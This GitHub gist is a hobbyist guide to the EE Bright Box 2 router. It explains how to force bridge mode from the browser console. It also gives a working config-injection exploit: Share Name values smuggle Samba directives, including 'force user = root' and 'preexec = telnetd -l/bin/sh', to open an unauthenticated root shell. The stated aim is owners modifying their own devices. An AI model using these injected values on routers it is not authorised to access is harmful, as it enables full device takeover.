Skip to content

Instantly share code, notes, and snippets.

@rufoa

rufoa/ee bright box 2.md

Created August 18, 2018 01:35
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save rufoa/cf6e4839e29822e6556913be2faf693c to your computer and use it in GitHub Desktop.
Save rufoa/cf6e4839e29822e6556913be2faf693c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ee bright box 2.md

The Bright Box 2 is a combined VDSL modem and wireless router supplied to customers of EE (Orange). It is manufactured by Arcadyan and uses a Broadcom bcm63xx SoC

These instructions are based on the latest firmware at the time of writing: v0.04.05.0001-OT (Fri Mar 24 17:29:32 2017)

Put it in bridge mode

  • This is for if you want to use the Bright Box as a VDSL modem only, and have a separate router act as the PPPoE client (e.g. ubiquiti edgerouter), avoiding double NAT
  • There is lot of nonsense, not least from people on EE's own forum, about how this cannot be done
  • If desired, change the Bright Box IP and subnet before doing this because the settings tab becomes inaccessible
  • Connect your router to port 4 (GigE) on your BB
  • On the router side, leave the port untagged (the BB takes care of the VLAN)
  1. Bright Box web UI -> Advanced tab -> Broadband Settings
  2. Press F12 to open Chrome DevTools -> Console tab
  3. In the dropdown box at the top, select mainFrame (broadband.htm) IFrame
  4. In the console execute this:
document.BRNTForm.protocol.value='1';
protocolChange();
  1. Close DevTools
  2. Click Save Settings in web UI

Getting a root shell

You can exploit a bug in the way the BB constructs its smb.conf config file to get a shell

  1. Plug a USB stick into the side
  2. Go to the Bright Box web UI -> Advanced -> USB File Sharing
  3. Set 'Samba Function' to Enable and save
  4. Under 'User account', create a new user and save
  5. Under 'USB Device', click the Share link next to your USB stick
  6. Use element inspector to turn the 'Share Name' textbox into a <textarea> and remove the maxlength attribute
  7. Paste this into the new textarea - N.B. do not leave a trailing newline character
r]
path = /
read only = no
[u
  1. In the developer tools Console tab, execute this: function isValidUsername(s) { return true; }
  2. In the Bright Box web UI, tick the box next to the user you added in step 4
  3. Click save settings
  4. Repeat steps 5 to 10 but use this for the new Share Name (no trailing newline):
r]
force user = root
[u
  1. Repeat steps 5 to 10 but use this for the new Share Name (no trailing newline):
u]
preexec = telnetd -l/bin/sh
#
  1. On your computer, browse to the network share \\192.168.1.1\u, which pops a root shell
  2. Telnet into your Bright Box
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
/ #
  1. You can also access the root filesystem via \\192.168.1.1\r

Notes

  • The Share Name is truncated at 31 chars which is why we have to assemble our samba config in several goes
  • Once you've got a shell you can remove the shares / disable Samba / unplug your USB stick
  • You can stop the shell with pkill telnetd
  • This doesn't persist across reboots because the newlines in the share names don't survive the config restore process on boot

Uses

  • On ADSL (not VDSL) you can use bcm_xdslctl configure --snr XX to change your target SNR and potentially sync at a faster speed (e.g. 50 to go from 6dB to 3dB)
  • You can disable TR-069 using util_sys_cli stopTR69
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment